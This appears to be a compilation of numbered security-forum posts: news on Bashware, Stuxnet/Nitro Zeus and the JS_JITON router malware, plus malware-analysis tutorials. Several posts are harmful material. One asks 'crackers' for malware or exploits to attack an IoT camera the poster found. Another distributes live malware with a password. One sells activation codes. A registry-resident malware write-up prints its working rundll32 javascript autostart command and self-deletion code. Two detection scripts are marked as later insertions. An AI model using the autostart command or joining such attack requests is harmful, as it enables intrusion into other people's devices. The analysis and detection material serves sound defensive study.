  13. 'Bashware' is a clever new type of malware that major antivirus programs can't detect. Microsoft surprised the technology world last year when it announced that users will be able to run native Linux applications in Windows 10 without virtualization. While this feature is meant to help developers, researchers believe it could be abused by attackers to hide malware from security products. Researchers from security firm Check Point Software Technologies developed a technique that uses Bash, the Linux command-line interface—or shell—that's now available in Windows, to make known malware undetectable. They named the result Bashware. The Windows 10 feature, called the Windows Subsystem for Linux (WSL), tricks Linux applications into believing they're communicating with the Linux kernel—the core part of the operating system that includes hardware drivers and essential services. In reality, those applications communicate with the WSL, which translates their system calls into equivalents for the Windows kernel. WSL was first announced in March 2016 and was added as a beta feature in the Windows 10 Anniversary Update, which was released in August 2016. Microsoft announced that it will become a fully supported feature in the upcoming Fall Creators Update. "WSL seems to be well designed. What allows Bashware to operate the way it does is the lack of awareness by various security vendors" WSL makes it easier for developers who need to write and test code both in Windows and Linux to do so without the overhead of a virtual machine. Many developers, whether they prefer Windows as their primary desktop OS or just need it for Visual Studio and other development tools, also like the simplicity of the Linux command line utilities for interacting with different programming language interpreters and component repositories. As it stands now, WSL is not turned on by default and users need to enable "development mode" on their systems in order to use it. 
However, Check Point claims that its Bashware attack automates the steps needed to silently enable WSL, download the Ubuntu-based userspace environment that comes with it, and then run malware inside. Linux programs executed through WSL will appear in Windows as "pico processes," a new type of process that is structurally different than those spawned by regular Windows applications. During their tests, the Check Point researchers found no security products that monitor pico processes, even though Microsoft provides a special application programming interface called the Pico API that can be used to do this. This apparent lack of interest by security vendors towards WSL might be the result of a widespread belief that users need to enable the feature manually and most of them won't do it because they don't have a need for it. However, according to Bashware's creators, "it's a little-known fact" that entering the developer mode can be achieved by modifying a few registry keys and this can be done silently in the background by an attacker who has the right privileges. A system reboot is indeed required under normal circumstances to enable WSL, but attackers could simply wait for victims to turn off their computers or could trigger a critical error to force a reboot, the Check Point researchers told me in an email. There might also be a way to load the WSL drivers manually without restarting the computer, but this method is still being investigated, they said. "We see it as both vital and urgent for security vendors to support this new technology in order to prevent threats such as the ones demonstrated by Bashware" What's interesting about Bashware is that attackers don't have to write malware programs for Linux in order to run them through WSL on Windows. Thanks to a program called Wine, they can use the technique to directly hide known Windows malware. 
In some ways, Wine is the equivalent of WSL on Linux, as it allows Linux users to run Windows programs on their systems without virtualization. The Bashware attack installs Wine inside the downloaded Ubuntu userspace environment and then launches Windows malware through it. Thanks to WSL, those malicious programs will be spawned back into Windows as pico processes, hiding them from security software. Check Point's Gal Elbaz and Dvir Atias are not the first security researchers to warn that attackers could abuse WSL to run malware. Reputed Windows internals expert Alex Ionescu called attention to the same risks in 2016 in talks at Black Hat USA and Microsoft's BlueHat conference. Ionescu, who is the vice president of endpoint detection and response strategy at security firm CrowdStrike, maintains a GitHub repository with his research on WSL. To some extent Bashware builds on Ionescu's prior findings, but the technique is adapted to the current state of WSL. It shows that one year later many security vendors are still not prepared to deal with this new technology. The good news is that in order to use Bashware, attackers need to already have administrator privileges on their victims' computers. This means they need to first compromise those systems using more traditional methods: phishing emails with malicious attachments, documents rigged with exploits for unpatched vulnerabilities, social engineering tricks, stolen administrative credentials and so on. Gaining admin rights on Windows computers is not necessarily a hard thing to do, and attackers do it all the time. However, these extra steps give security products a chance to detect and break attack chains before Bashware can be used to hide malicious payloads. The Check Point researchers declined to name the security products whose detection mechanisms they managed to bypass, noting that their goal is for this research to serve as a wakeup call for the entire security industry. 
WSL is not a common attack vector and if attackers were to use it as a source of attacks, they would first need to download malware onto the targeted computer, said Adam Bromwich, senior vice president of security technology and response at Symantec. "Based on this WSL architecture, Symantec's scanners, machine learning and protection technologies are designed to scan and detect malware created using WSL." Kaspersky Lab told me in an email it plans to modify its antivirus software to detect this type of malware in the future. Currently, all of the company's products can detect malware downloaders and other Windows-based parts of such attacks, Kaspersky Lab said. Antivirus firm Bitdefender did not immediately respond to a request for comment. We will update this post if we hear back. Update: This post has been updated with comment from Kaspersky, and has been updated to include more context about previous research in this area. Via vice.com
  14. Hey Crackers!!! I discovered an IoT based device on 84.241.* which I think it's some kind of smart camera, If you have any malware or exploit to attack corresponding host please don't hesitate to share with me. If there's a better discovery technique please let me know. Share your experience of the same IoT based platforms. Your LOVE H3$!z
  15. This challenge contains real malware. Run it only in isolated virtual machines (VirtualBox, VMware, etc.) with no network access. P.S. Sandbox-type programs are not safe - tested. Download: h t t p : / / g e . t t / 7 T V l L m i 2 Password: dezarhivez un malware Challenge made in collaboration with @Gecko. Solved the challenge: @sclipici
  16. Hi, I am selling activation codes for 2 of the best-known security products, suite: mobile protection + PC antivirus $10 via PayPal, or antivirus only $5. Anyone interested can contact me by PM.
  17. OPERATION OLYMPIC GAMES

Programmers from the National Security Agency and the Israeli military created a series of viruses to attack the computers that control Iran's nuclear enrichment center at Natanz. The attacks were repeated over several years, and each time the programs were improved to make them difficult to detect. One of the variants escaped from Natanz and became public. A New York Times article published in June 2012 presented the cyber-attack actions in detail:

2006 – with the restart of the uranium enrichment program at the Natanz plant, the US begins planning cyber-attack actions
2007 – a replica of the Iranian installations is built in laboratories and collaboration with Israel begins to develop a virus
2008 – centrifuges at the plant begin to fail, simulating random defects in order to confuse the Iranian specialists
2009 – the new Obama administration takes over the program from G. Bush and decides to continue it. Obama revises it and asks for periodic briefings on the progress of the attack plan.
2010 – spring – the US, together with Israeli Unit 8200, launches a cyber attack with a new variant of the virus against an area of 1,000 centrifuges used for uranium enrichment
2010 – summer – the virus appears on the Internet, replicating massively. Within a few weeks, information about the virus, which is named Stuxnet, appears in the press. Obama decides to continue the attack and in the end about 1,000 centrifuges, representing 20% of the total, are taken out of service
2010-2011 – the US estimates that the Iranian program was delayed by about a year and a half
2011-2012 – the USA and Israel, continuing the attacks, look for new targets to slow down the Iranian nuclear program.

Cyber-security specialists have found other malware that has been linked to Stuxnet: Flame, Duqu, Gauss, MiniFlame. Stuxnet is the only one that actually does physical damage. It controls the transmission inside the nuclear enrichment facility at Natanz, blowing up the centrifuges. All the other viruses serve as supporting malware: they gather information, which can then be used to launch new attacks, such as with Stuxnet.

Operation Nitro Zeus

In the first years of the Obama administration, the United States developed an elaborate plan for a cyber attack on Iran, in case the diplomatic effort to limit its nuclear program failed and a military conflict ensued. The plan, code-named Nitro Zeus, was designed to disable air defenses, communications systems and essential parts of Iran's power grid, and was shelved, at least for the foreseeable future, after the nuclear agreement concluded between Iran and six other nations. In practice, this attack would have taken Iran's infrastructure out of service. Nitro Zeus was part of an effort to give President Obama alternatives to a full-scale war.

Planning for Nitro Zeus involved thousands of programming and intelligence specialists, including placing electronic implants in Iranian computer networks to "prepare the battlefield", in Pentagon parlance. This operation was also aimed at preventing Israel from bombing the Iranian installations and triggering a regional conflict.

While the Pentagon was making these preparations, American intelligence agencies developed a separate, far more narrowly focused cyber plan to disable the Fordo nuclear enrichment site, built deep inside a mountain near the city of Qum. The attack would have been a covert operation, which the president can authorize even in the absence of a direct conflict. Fordo has long been considered one of the hardest targets in Iran, buried too deep even for the most powerful bunker-busting weapons in the American arsenal. Under the terms of the nuclear agreement with Iran, two-thirds of the centrifuges inside Fordo have been removed in recent months, together with all nuclear material. Any nuclear-related work is banned at the facility, and it is being converted to other uses, at least for the next 15 years.

The development of the two secret programs suggests how concerned the Obama administration was that negotiations with Iran might fail. In this way, cyber warfare has become a standard element of the arsenal for what are now called "hybrid" conflicts.

The existence of Nitro Zeus was revealed in a spectacular and novel way by the documentary "Zero Days", first shown in February 2016 at the Berlin Film Festival. Directed by Alex Gibney, who is known for other documentaries, including the Oscar-winning "Taxi on the Dark Side" about the use of torture by American interrogators, and "We steal secrets: WikiLeaks story". He is considered the best documentary maker at present. "Zero days" describes the conflict between Iran and the West, the cyber attack on the uranium enrichment plant at Natanz, and the debates inside the Pentagon over whether the United States has a viable doctrine for the use of a new form of weaponry whose ultimate effects are only vaguely understood.

Mr. Gibney and his investigative team, led by Javier Botero, interviewed former and current participants in the Iran program, who revealed details of the effort to insert "implants" into Iran's computer networks, which could be used to monitor the country's activities and, if ordered by Mr. Obama, to attack the infrastructure. (Under rules laid out in presidential directives, some made public three years ago by Edward J. Snowden, only the president can authorize an offensive cyber attack, just as with the use of nuclear weapons.)

Many critics comment on how such "delicate" subjects became public. The USA has certainly shown part of its capabilities in cyber warfare. Is it possible that these infrastructure-destroying capabilities were used in the successful negotiations with Iran? I don't think we can assess that; at most we can guess. What is certain is that we are witnessing a development similar to the beginnings of the use of nuclear weapons as a means of intimidation and domination. Perhaps in this new military domain we too will have a say!!

Source: http://www.rumaniamilitary.ro/razboiul-cibernetic-contra-iranului
Zero days online: topdocumentaryfilms . com/zero-days/
  18. Security researchers from Trend Micro recently discovered a new JavaScript-based malware that infects your mobile devices and also attacks your home router by altering its DNS (Domain Name System) settings. This new threat was named as JS_JITON and was first noticed at the end of December 2015, continuing to infect devices up until this day, hitting its peak in February 2016, with over 1,500 infections per day. Researchers say that the malware spreads its infection chain in a very simple way.

Attackers place their code in some websites and wait for users to visit

The malware’s infection chain is simple. According to Trend Micro researchers, attackers place malicious code on compromised websites and wait for users to visit these pages using mobile devices. Once this happens, the malware is downloaded to the user’s mobile device and executes, trying to connect to the local home network’s router IP using a series of admin and password combos hardcoded in the JS_JITON malware source code. Over 1,400 credentials are included, and once the malware authenticates on the device, it will change the router’s DNS settings.

Very little is known about what the intentions of this malware are, but taking into account that at one point it also included malicious code that executed from desktop computers, Trend Micro researchers believe this is a “work in progress,” with its creators still exploring their attack’s capabilities. The belief was made strong by the fact that attackers regularly update JS_JITON’s source code, changing small details here and there, fine tuning their attacks. Additionally, at one point, the JS_JITON source code also included a keylogging component.

According to researchers JS_JITON could attack D-Link and TP-Link routers, but it also included a special exploit to take advantage of CVE-2014-2321, an older vulnerability in ZTE modems. Malware like this could be a serious threat if not killed in the initial stage. Source
  19. Windows Malware Analysis Essentials Master the fundamentals of malware analysis for the Windows platform and enhance your anti-malware skill set Author: Victor Marak Read: https://www.scribd.com/doc/283049338/Windows-Malware-Analysis-Essentials Download: https://www.sendspace.com/file/rbwzjv
  20. Some non typical malware which doesn't have any attention from "security experts" and other internet clowns. Maybe because of this it is not well detected on VT. The key features of it, making it non typical:

1) This malware lives in registry value.
2) Non typical dropper self-deletion method, nothing zero day though.
3) Malware startup location protection in a backdoor Sirefef way.
4) It downloads, installs and uses Windows KB968930 (MS PowerShell).

More details below

1) This malware is stored under key HKCU\Software\Microsoft\Windows\CurrentVersion\Run and its autostart location is invisible to regedit, why is explained in part 3. That's what is really here. "Unnamed" value is a forged registry value that holds command to execute malware script stored in "Default" value. Exactly this value makes regedit crazy. Autostart malware script below.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")

Its purpose - read, encode and execute script stored in the "Default" value. The decoded malware is now set as process environment variable named "a" and contains additional code to execute stored again as script code, let's call it ScriptA. It is named ScriptA.txt in attached archive. Decoded script attached as ScriptB.txt. As you can see they multiple times use base64 encoding for layered payload. Inside ScriptB you can find another base64 encoded which is attached as PayloadA.txt. This is base64 encoded dll which is actual malware designed to be running inside zombified copy of dllhost.exe (this malware is aware of WOW64 and will select appropriate version of this executable - Wow64DisableWow64FsRedirection %windir%\syswow64\dllhost.exe or %windir%\system32\dllhost.exe). Final payload dll (attached as payload.dll) packed with MPRESS v2.19. Unpacking MPRESS is similar to manual unpack of UPX.
This dll is simple and is capable of downloading and executing arbitrary files on infected machine (WinExec). Also because it is used in startup process this dll is also responsible for zombifying dllhost.exe process and self-injection through NtQueueApcThread.

2) It uses NTFS ADS for dropper self-deletion and more trivial MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT if first method failed. After self-deletion malware persists on infected computer only in the zombified processes VA and in the registry. First dropper attaches itself as stream to dropper. e.g. C:\malware.exe -> C:\malware.exe:0 where 0 is a NTFS data stream copy of malware.exe. Next it spawns process from ADS and calls DeleteFile. Yeah I too can F5 in HexRays.

signed int __stdcall sub_401696(LPCSTR lpExistingFileName)
{
  char *NewFileName;
  struct _STARTUPINFOA StartupInfo;
  struct _PROCESS_INFORMATION ProcessInformation;

  snprintf(&NewFileName, 0xFFFu, "%s:0", lpExistingFileName);
  if ( CopyFileA(lpExistingFileName, &NewFileName, 0) )
  {
    StartupInfo.cb = 68;
    memset(&StartupInfo.lpReserved, 0, 0x40u);
    if ( CreateProcessA(&NewFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation) )
    {
      CloseHandle(ProcessInformation.hThread);
      CloseHandle(ProcessInformation.hProcess);
      return 1;
    }
    DeleteFileA(&NewFileName);
  }
  else
  {
    if ( MoveFileExA(&NewFileName, 0, MOVEFILE_DELAY_UNTIL_REBOOT) )
      return 1;
  }
  return 0;
}

3) Embedded nulls used for protecting startup key HKCU\Software\Microsoft\Windows\CurrentVersion\Run key from removal and for hiding actual run value (regedit cannot handle incorrect value name and cancels listing items). Malware payload dll inside dllhost zombie process additionally works as a watchdog and will recover malware startup registry values if they are removed.

Detection and Removal instructions:

This malware can be easily revealed because of invasive self-protection it uses. Autoruns and ProcessExplorer from sysinternals are all you need to detect presence of this malware.
Locate and terminate dllhost.exe running without parents (it is launched by powershell which then exits).
regdelnull hkcu -s to remove forged Run subkey.
Regedit - delete whole HKCU\Software\Microsoft\Windows\CurrentVersion\Run key.

Sample courtesy of R136a1 https://twitter.com/MalwareChannel/status/454939686885412864 Also thanks to B-boy/StyLe/ who brought attention to this malware. Download pass: infected Source
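A detection and unpacking aid for the traits described in the post above, added here as an example and not taken from the original write-up: it flags Run-key values whose names contain embedded NULs or whose data runs script through rundll32 with `mshtml,RunHTMLApplication`, and it peels nested base64 layers so an analyst can see what the innermost payload is. The value list, the shortened command line and the double-encoded "MZ" blob are constructed samples; collecting raw value names on a live system (for instance with a native registry enumerator that returns counted strings) is assumed to happen elsewhere.

```python
import base64
import binascii
import re

# rundll32 handed a javascript: pseudo-URL that resolves to mshtml,RunHTMLApplication
SCRIPT_VIA_RUNDLL32 = re.compile(
    r"rundll32(\.exe)?\b.*javascript:.*mshtml\s*,\s*RunHTMLApplication", re.I | re.S)
# script that pulls further code back out of the registry
REG_SELF_READ = re.compile(r"\.RegRead\s*\(", re.I)
BASE64_TEXT = re.compile(rb"^[A-Za-z0-9+/\s]+={0,2}\s*$")

# Constructed Run-key values: (raw UTF-16LE name with explicit length, data).
SAMPLE_RUN_VALUES = [
    ("Sync".encode("utf-16-le"), r"C:\Apps\Sync\sync.exe /background"),
    ("Panel".encode("utf-16-le"), "rundll32.exe shell32.dll,Control_RunDLL"),
    ("\x00upd".encode("utf-16-le"),
     r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";'
     r'document.write((new ActiveXObject("WScript.Shell"))'
     r'.RegRead("HKCU\\software\\example\\run\\"))'),
]

# Constructed stand-in for a layered payload: a fake 32-byte PE header, encoded twice.
SAMPLE_LAYERED = base64.b64encode(base64.b64encode(b"MZ" + bytes(30)))


def inspect_run_values(values):
    """Return findings for Run-key values that show the traits from the post."""
    findings = []
    for raw_name, data in values:
        name = raw_name.decode("utf-16-le", errors="replace")
        reasons = []
        if "\x00" in name:
            # Tools that treat names as NUL-terminated cannot list or delete these.
            reasons.append("value name contains an embedded NUL")
        if SCRIPT_VIA_RUNDLL32.search(data):
            reasons.append("rundll32 runs script via mshtml,RunHTMLApplication")
            if REG_SELF_READ.search(data):
                reasons.append("script loads more code from the registry")
        if reasons:
            findings.append({"name": name.replace("\x00", "\\0"),
                             "reasons": reasons})
    return findings


def peel_base64(blob, max_layers=8):
    """Strip nested base64 layers; return (layers removed, innermost bytes)."""
    layers = 0
    while layers < max_layers and len(blob) >= 16 and BASE64_TEXT.match(blob):
        try:
            blob = base64.b64decode(b"".join(blob.split()), validate=True)
        except (binascii.Error, ValueError):
            break                      # looked like base64 but did not decode
        layers += 1
    return layers, blob


if __name__ == "__main__":
    for finding in inspect_run_values(SAMPLE_RUN_VALUES):
        print(finding["name"], "->", "; ".join(finding["reasons"]))
    depth, inner = peel_base64(SAMPLE_LAYERED)
    print("base64 layers:", depth, "PE header:", inner[:2] == b"MZ")
```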
  21. The Windows API for Hackers and Reverse Engineers

The Windows API is one of the “must know” areas for most reverse engineers and exploit writers. It’s an area where the more I use the APIs the more I find myself looking up specific APIs and wishing that I would have known what I know now about these sometimes vague and/or mysterious functions. Why should someone who’s in the INFOSEC community care about these APIs? Well to put it shortly, they can make your life considerably easier. If you do incident response, are just getting started writing exploits, or anything related, then you’ve likely seen these APIs mentioned before. They’re a crucial part of everything from shellcode design to malware analysis.

One of the most common places you’ll run into these APIs is in malware analysis. The Windows APIs are crucial to nearly every piece of software that runs on Windows. Without these APIs malware authors would be left writing a considerable amount more code, which few malware authors want to do. Knowing that these are going to be the malware’s link to Windows itself, just examining the APIs can give you great clues about what the malware is trying to do. (Note: malware authors could statically compile their code, which would not need to import the APIs, this is not common and would leave the malware sample significantly larger)

There are endless tools which will show you which APIs are being imported. Some of the most common tools are OllyDbg, Immunity Debugger, IDA Pro, MASTIFF, and countless other tools and scripts. Let’s take a look at a malware sample’s imports.
kernel32.dll DeleteCriticalSection 0x4090dc
kernel32.dll LeaveCriticalSection 0x4090e0
kernel32.dll EnterCriticalSection 0x4090e4
kernel32.dll VirtualFree 0x4090e8
kernel32.dll LocalFree 0x4090ec
kernel32.dll GetCurrentThreadId 0x4090f0
kernel32.dll GetStartupInfoA 0x4090f4
kernel32.dll GetCommandLineA 0x4090f8
kernel32.dll FreeLibrary 0x4090fc
kernel32.dll ExitProcess 0x409100
kernel32.dll WriteFile 0x409104
kernel32.dll UnhandledExceptionFilter 0x409108
kernel32.dll RtlUnwind 0x40910c
kernel32.dll RaiseException 0x409110
kernel32.dll GetStdHandle 0x409114
user32.dll GetKeyboardType 0x40911c
user32.dll MessageBoxA 0x409120
advapi32.dll RegQueryValueExA 0x409128
advapi32.dll RegOpenKeyExA 0x40912c
advapi32.dll RegCloseKey 0x409130
kernel32.dll TlsSetValue 0x409138
kernel32.dll TlsGetValue 0x40913c
kernel32.dll TlsFree 0x409140
kernel32.dll TlsAlloc 0x409144
kernel32.dll LocalFree 0x409148
kernel32.dll LocalAlloc 0x40914c
wsock32.dll closesocket 0x409154
wsock32.dll WSACleanup 0x409158
wsock32.dll recv 0x40915c
wsock32.dll send 0x409160
wsock32.dll connect 0x409164
wsock32.dll htons 0x409168
wsock32.dll socket 0x40916c
wsock32.dll WSAStartup 0x409170
wsock32.dll gethostbyname 0x409174
advapi32.dll RegSetValueExA 0x40917c
advapi32.dll RegCreateKeyA 0x409180
advapi32.dll RegCloseKey 0x409184
advapi32.dll AdjustTokenPrivileges 0x409188
advapi32.dll LookupPrivilegeValueA 0x40918c
advapi32.dll OpenProcessToken 0x409190
user32.dll GetForegroundWindow 0x409198
user32.dll wvsprintfA 0x40919c
kernel32.dll CloseHandle 0x4091a4
kernel32.dll RtlMoveMemory 0x4091a8
kernel32.dll RtlZeroMemory 0x4091ac
kernel32.dll WriteProcessMemory 0x4091b0
kernel32.dll ReadProcessMemory 0x4091b4
kernel32.dll VirtualProtect 0x4091b8
kernel32.dll Sleep 0x4091bc
kernel32.dll GetTickCount 0x4091c0
kernel32.dll MoveFileExA 0x4091c4
kernel32.dll ReadFile 0x4091c8
kernel32.dll WriteFile 0x4091cc
kernel32.dll SetFilePointer 0x4091d0
kernel32.dll FindClose 0x4091d4
kernel32.dll FindFirstFileA 0x4091d8
kernel32.dll DeleteFileA 0x4091dc
kernel32.dll CreateFileA 0x4091e0
kernel32.dll GetPrivateProfileIntA 0x4091e4
kernel32.dll GetPrivateProfileStringA 0x4091e8
kernel32.dll WritePrivateProfileStringA 0x4091ec
kernel32.dll SetFileAttributesA 0x4091f0
kernel32.dll GetCurrentProcessId 0x4091f4
kernel32.dll GetCurrentProcess 0x4091f8
kernel32.dll Process32Next 0x4091fc
kernel32.dll Process32First 0x409200
kernel32.dll Module32Next 0x409204
kernel32.dll Module32First 0x409208
kernel32.dll CreateToolhelp32Snapshot 0x40920c
kernel32.dll WinExec 0x409210
kernel32.dll lstrcpyA 0x409214
kernel32.dll lstrcatA 0x409218
kernel32.dll lstrcmpiA 0x40921c
kernel32.dll lstrcmpA 0x409220
kernel32.dll lstrlenA 0x409224
kernel32.dll lstrlenA 0x40922c
kernel32.dll lstrcpyA 0x409230
kernel32.dll lstrcmpiA 0x409234
kernel32.dll lstrcmpA 0x409238
kernel32.dll lstrcatA 0x40923c
kernel32.dll WriteProcessMemory 0x409240
kernel32.dll VirtualProtect 0x409244
kernel32.dll TerminateThread 0x409248
kernel32.dll TerminateProcess 0x40924c
kernel32.dll Sleep 0x409250
kernel32.dll OpenProcess 0x409254
kernel32.dll GetWindowsDirectoryA 0x409258
kernel32.dll GetTickCount 0x40925c
kernel32.dll GetSystemDirectoryA 0x409260
kernel32.dll GetModuleHandleA 0x409264
kernel32.dll GetCurrentProcessId 0x409268
kernel32.dll GetCurrentProcess 0x40926c
kernel32.dll GetComputerNameA 0x409270
kernel32.dll ExitProcess 0x409274
kernel32.dll CreateThread 0x409278
user32.dll wvsprintfA 0x409280
user32.dll UnhookWindowsHookEx 0x409284
user32.dll SetWindowsHookExA 0x409288
user32.dll GetWindowThreadProcessId 0x40928c
user32.dll GetWindowTextA 0x409290
user32.dll GetForegroundWindow 0x409294
user32.dll GetClassNameA 0x409298
user32.dll CallNextHookEx 0x40929c

Looking over these imported API functions may at first seem useless to the untrained analyst. However, if you begin to dissect what some of the APIs can be used for you can begin to make assumptions about the function of this malware.
For example, GetTickCount is a very common API for detecting debuggers. AdjustTokenPrivileges and LookupPrivilegeValueA are both commonly used in accessing the Windows security tokens. RegSetValueExA, RegCreateKeyA, and RegCloseKey are used when accessing and altering a registry key. Taking just these APIs into consideration you could begin to make some interesting hypotheses about the capabilities of this specific sample.

I’ve noticed that analysts who don’t totally understand these API functions will typically ignore them. For that fact I’m creating a “cheat sheet” for the Windows API functions. The “pre-final” release is attached below. Please don’t forget that Microsoft did not build these APIs for malicious use and they are very commonly used by Windows programmers (unless it’s an undocumented API). Thus analyzing just the imported APIs may not tell you if a sample is malicious or not (but is very useful if you already know a sample is malicious).

Over the past month I’ve also been working on analyzing what is now over 5TB of malware to gather the most frequently used Windows APIs. This data will likely continue to process for close to another month. Once this is done I’ll work on completing this cheat sheet based on those findings and write another post about my discoveries. Keeping that in mind, this list is not final and if you have any feedback, comments, questions, or recommendations please make them!

In the course of developing the current list I used multiple resources; I’d just like to highlight a few. These are also great resources if you’re looking to learn more.

Resources:
  • Practical Malware Analysis – great book on reverse engineering malware
  • MSDN – where to go if you’re curious about a specific Windows API
  • Windows PE File Details – Great article that describes the fundamentals of the PE file and more details surrounding PE file imports

Cheat Sheet Version .5 : Download
Source : https://www.bnxnet.com/windows-api-for-hackers/
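One way to turn an import listing into the kind of hypotheses the post above describes, as an added Python example that is not part of the original post. The rule set, the thresholds and the sample listing are assumptions constructed for illustration; a match is a lead to investigate, not a verdict on the sample.

```python
import re

# Constructed import listing ("dll function" per line); not taken from a real sample.
SAMPLE = """\
kernel32.dll GetTickCount
advapi32.dll OpenProcessToken
advapi32.dll LookupPrivilegeValueA
advapi32.dll AdjustTokenPrivileges
advapi32.dll RegCreateKeyA
advapi32.dll RegSetValueExA
wsock32.dll socket
wsock32.dll connect
"""

# Hypothesis -> (APIs that suggest it, minimum number that must be imported).
# Illustrative rules only: an assumption of this example, not a complete mapping.
RULES = {
    "timing check (possible debugger detection)": ({"GetTickCount"}, 1),
    "token privilege adjustment": (
        {"OpenProcessToken", "LookupPrivilegeValue", "AdjustTokenPrivileges"}, 3),
    "registry modification": ({"RegCreateKey", "RegSetValueEx"}, 2),
    "outbound network client": ({"socket", "connect", "send", "recv"}, 3),
}

def normalize(name):
    """Drop the ANSI/Unicode suffix so RegSetValueExA and RegSetValueExW match one rule."""
    return re.sub(r"(?<=[a-z])[AW]$", "", name)

def parse_imports(listing):
    """Return {dll: set(normalized function names)} from 'dll function' lines."""
    imports = {}
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) >= 2:
            imports.setdefault(parts[0].lower(), set()).add(normalize(parts[1]))
    return imports

def hypotheses(imports):
    """Return {hypothesis: sorted evidence APIs} for every rule whose threshold is met."""
    seen = set().union(*imports.values())
    found = {}
    for label, (apis, needed) in RULES.items():
        evidence = sorted(apis & seen)
        if len(evidence) >= needed:
            found[label] = evidence
    return found

if __name__ == "__main__":
    print(hypotheses(parse_imports(SAMPLE)))
```

The sample imports only two of the four socket calls, so the network rule stays below its threshold and is not reported.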
  22. Static Malware Analysis

Starting here, I would like to share the results of my recent research into malware analysis. We will begin with some basics and proceed to advanced levels. In this first installment, we will discuss the techniques involved in static analysis of malware. I will also include some files for illustrative purposes in this document. Before we directly move onto the analysis part, let us set up context with some definitions.

What is Malware?

Malware is any software that does something that causes detriment to the user, computer, or network—such as viruses, trojan horses, worms, rootkits, scareware, and spyware.

Malware Static Analysis

Basic static analysis consists of examining the executable file without viewing the actual instructions. Basic static analysis can confirm whether a file is malicious, provide information about its functionality, and sometimes provide information that will allow you to produce simple network signatures. Basic static analysis is straightforward and can be quick, but it’s largely ineffective against sophisticated malware, and it can miss important behaviors.

Enough with definitions — let’s get down to Malware Static Analysis Techniques.

Malware Static Analysis Techniques

Uploading the results to VirusTotal

The very first technique in static analysis is to upload the suspicious executable to VirusTotal, which runs the executable against several AV solutions and gives the result. For example, the below file states that the detection ratio is 17 out of 57.

Finding strings

Searching through the strings can be a simple way to get hints about the functionality of a program. For example, if the program accesses a URL, then you will see the URL accessed stored as a string in the program. Microsoft has a utility called “Strings”.
When Strings searches an executable for ASCII and Unicode strings, it ignores context and formatting, so that it can analyse any file type and detect strings across an entire file (though this also means that it may identify bytes of characters as strings when they are not). Strings searches for a three-letter or greater sequence of ASCII and Unicode characters, followed by a string termination character. Below are some examples of strings from which important information can be revealed.

Using the Strings utility, files can be searched with the following command at the cmd:

    Strings <filename>

Example 1: Below is a string extraction of keywords from a malicious executable. As we can see, it gives us good information that functions like “FindNextFileA” and “FindFirstFileA”, which shows that this executable will search for a file, and then combining that with “CopyFileA” means that it will find a file and replace it with another file. Another important point to note is about “Kerne132.dll”. This is a misleading text and should not be confused with “Kernel32.dll”.

Example 2: Below is another extraction from a string utility. It shows us that usage of “CreateProcessA” will create a process. Commands like “Exec” and “sleep” are used to control a remote file. It can be a bot as well, and then an IP field, which can be the IP of a controlling server.

Example 3: Below is another example of an extraction using Strings. Interesting fields are “InternetOpenURLA” which states that it will connect with some external server to download something, and then we have a http:// file also, which even clarifies the server address from which it will connect and download.

How to check if a malware code is obfuscated or not?

Often malware writers obfuscate their codes so that the files are hard to read. When a packed program runs, a wrapper program also runs around to unpack it.
With static analysis, it is really hard to predict which files are packed unless it is clearly evident that they are. For example, tools like PEid sometimes are able to tell that the files are packed. In the below figure, it is clearly evident that files are packed with UPX.

Files which are UPX packed can be unpacked by the following command:

    upx -o <newfilename> -d <packedfilename>

Information gathering from Portable Executable (PE) file format

PE file format is used by Windows executables, DLLs etc. It contains the necessary information for Windows OS loader to run the code. While examining the PE files, we can analyse which functions have been imported, exported and what type of linking is there i.e. runtime, static or dynamic.

PE file sections

A PE file contains a header and some more important sections. Under these sections there is some useful information. Let’s understand these sections as well.

.text: This contains the executable code.
.rdata: This section holds read only globally accessible data.
.data: Stores global data accessed through the program.
.rsrc: This section stores resources needed by the executable.

Most often malware writers use dynamic linking in their code. For example, with the use of the tool Dependency Walker, we can see in the below screenshot that under WININET.dll are functions like “InternetOpenUrlA”, which states that this malware will make a connection with some external server.

Note: Wininet.dll contains higher level networking functions that implement protocols such as FTP, HTTP and NTP.

Under the header, there is a subsection named “IMAGE_FILE_HEADER”, which contains the timestamp field. This timestamp shows the compile time of the executable. This is very important information, since if the time is old, then there may be a case that AV solutions might have a signature around it.
However, this field is not reliable, since the compile time can be changed easily by the malware writer.

Suppose from static analysis, an analyst predicts that the executable will create a process and then suppose the following exec and sleep command is found, but there is no information found about the respective DLL, which has a function to connect with another server. In that case, the resource is hidden with the executable. Open the .rsrc section of PE file with a tool like Resource Hacker to gain more information regarding the malware.

Below is the analysis of the above resource using PEview.

As we have learnt with static analysis, there is very little information that can be gathered, but it is very useful too. In a coming article, I will bring in dynamic analysis though basic to the rescue.

Source

MALWARE ANALYSIS BASICS - PART 2

Dynamic Analysis Techniques

As we have covered the malware analysis basics with static techniques here, this post is all about performing the basic analysis of malware using dynamic technique. As we have seen in the previous post, the ability to fully perform malware analysis is very much restricted using static techniques either due to obfuscation, packing, or the analyst having exhausted the available static analysis techniques.

Precautions

Before performing dynamic malware analysis, be sure to do it in a safe environment. Consider deploying a Windows virtual machine and using VMware for provisioning virtual machines. You should also take a snapshot of the virtual machine before executing the malicious binaries so that the safe state can be easily restored.

Analyzing with Process Monitor

Process Monitor is an advanced monitoring tool for Windows that provides a way to monitor certain registry, file system, network, process, and thread activities. Process Monitor monitors all system calls it can gather as soon as it is run.
Since there are always a huge number of calls being made in the Windows OS, it is sometimes impractical to discover important events. Process Monitor helps this issue with a filter tab through which we can filter by the type of calls. For example, see the screenshot below. It shows that I have applied a filter with operation of “WriteFile” and “RegSetValue”. These are usually the calls made by a malicious executable to write the file onto the disk and to make registry changes.

After applying the filter, we get a list of following events in Process Monitor. The most important are the top two entries which show the execution of file and creation of registry entry with a new entry named “Video Driver.” Other entries can be ignored as it is usual for pseudorandom numbers to be generated.

On clicking the first entry, we can even see what action that call has made. As is clear from the screenshot below, a total of 7168 bytes have been written to the file system by this binary.

Analyzing with Process Explorer

